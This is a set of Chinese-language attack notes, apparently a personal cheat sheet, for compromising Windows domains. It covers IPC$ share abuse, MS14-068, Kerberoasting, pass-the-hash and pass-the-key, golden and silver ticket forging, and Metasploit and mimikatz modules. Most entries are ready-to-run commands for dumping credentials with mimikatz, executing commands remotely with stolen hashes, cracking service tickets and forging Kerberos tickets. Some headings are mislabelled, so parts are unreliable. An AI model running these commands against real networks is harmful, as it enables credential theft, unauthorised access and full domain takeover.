IPC

IPC$入侵

• 建立非空连接
  

• 新建批处理
  

  

• Copy命令上传
  

  

• 查看目标靶机时间
  

  

• 通过at命令在特定时间执行批处理文件
  

  

• 在目标靶机上查看
  

  

其他命令

• 将目标共享建立一个映射g盘
  net use g: \\192.168.3.68\c$
  

  

• 查看已建立的会话
  

  

通过工具进行会话连接执行

psexec.exe  \\192.168.1.108   cmd  -uadministrator   -p  123456

csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

返回一个cmd交互界面执行即可

MS14068

• 首先尝试访问域控共享文件夹
  
  拒绝访问

• 使用ms16048

-u 域账号[email protected]+域名称
-p 为当前用户的密码，即 ts1 的密码
-s 为 ts1 的 SID 值，可以通过 whoami /all 来获取用户的 SID 值 -d 为当前域的域控

• 生成ccache文件
  

• 删除当前缓存的kerboeos票据
  kerberos::purge
  

  

• 导入ccache文件
  kerberos::ptc
  

  

• 再次访问域控共享文件
  

  

Kerberoating

早期kerberoating

工具 Kerberoast工具包 Mimikatz

• 使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描

• 根据微软提供的类KerberosRequeststorSecurityToken发起Kerberos请求申请票据
  Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SRC_DB_ODAY.org:1433"
  

• 通过klist命令查看当前会话存储的Kerberos票据
  klist
  

  

• 使用mimikatz导出
  kerberos::list /export
  

  

• 使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破
  python tgsrepcrack.py list1.txt [email protected]SSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi
  

  

kerberoating新姿势

工具 Invoke-Kerberoast.ps1 HashCat

• 转为Hashcat格式
  Invoke-kerberoast –outputformat hashcat | fl
  
• 保存
  nvoke-Kerberoast -Outputformat Hashcat | fl > test1.txt

• Hashcat爆破
  hashcat64.exe –m 13100 test1.txt password.list --force

  

Pth

Pass the hash

• 使用mimikatz先获取hash

privilege::debug

sekurlsa::logonpasswords

• 攻击机执行

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"

• 验证pth

wmiexec

• Invoke-SMBExec

https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

• Invoke-SMBExec

Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

如果只有SMB文件共享的权限，没有远程执行权限，可以使用该脚本

• wmiexec.py

https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

https://github.com/maaaaz/impacket-examples-windows

wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/[email protected] "whoami"

普通用户可用

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec.git

crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7

Ptk

对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012，可以使用AES keys代替NT hash

• 获取用户的aes key

mimikatz "privilege::debug" "sekurlsa::ekeys"

• 注入aes key

mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436" 

Ptt

Golden ticket(黄金票据)

前提：
域名称
域SID
krbtgt账户密码
伪造用户名

• dump krbtgt hash

privilege::debug
lsadump::lsa /patch

• 生成ticket

kerberos::golden  /admin:administrator  /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2  /ticket:test.kiribi

• 注入凭据

kerberos::ptt test.kirbi

– 验证Golden ticket

golden ticket（白银票据）

前提：
域名称
域SID
域的服务账户的密码hash
伪造用户名

• dump server hash

privilege::debug
sekurlsa::logonpasswords

• 导入凭证

kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a  /service:cifs /user:syst1m /ptt

• 验证

Tips

mimikatz复制粘贴困难，可使用如>>log.txt

exploit/windows/smb/psexec 使用hash传递

post/windows/gather/smart_hashdump 读取hash

.domain_list_gen 获取域管理账户列表

auxiliary/gather/kerberos_enumusers 用户名枚举

auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068

load kiwi
kerberos_ticket_use /tmp/[email protected] kiwi扩展来导入TGT票证
参考：https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/

• Mimikatz

load mimikatz 加载
mimikatz_command -f version  版本
mimikatz_command -f fu 获取可用模块列表
msv 检索msv凭证
wdigest 读取密码
kerberos 尝试检索kerberos凭据

看到了再加～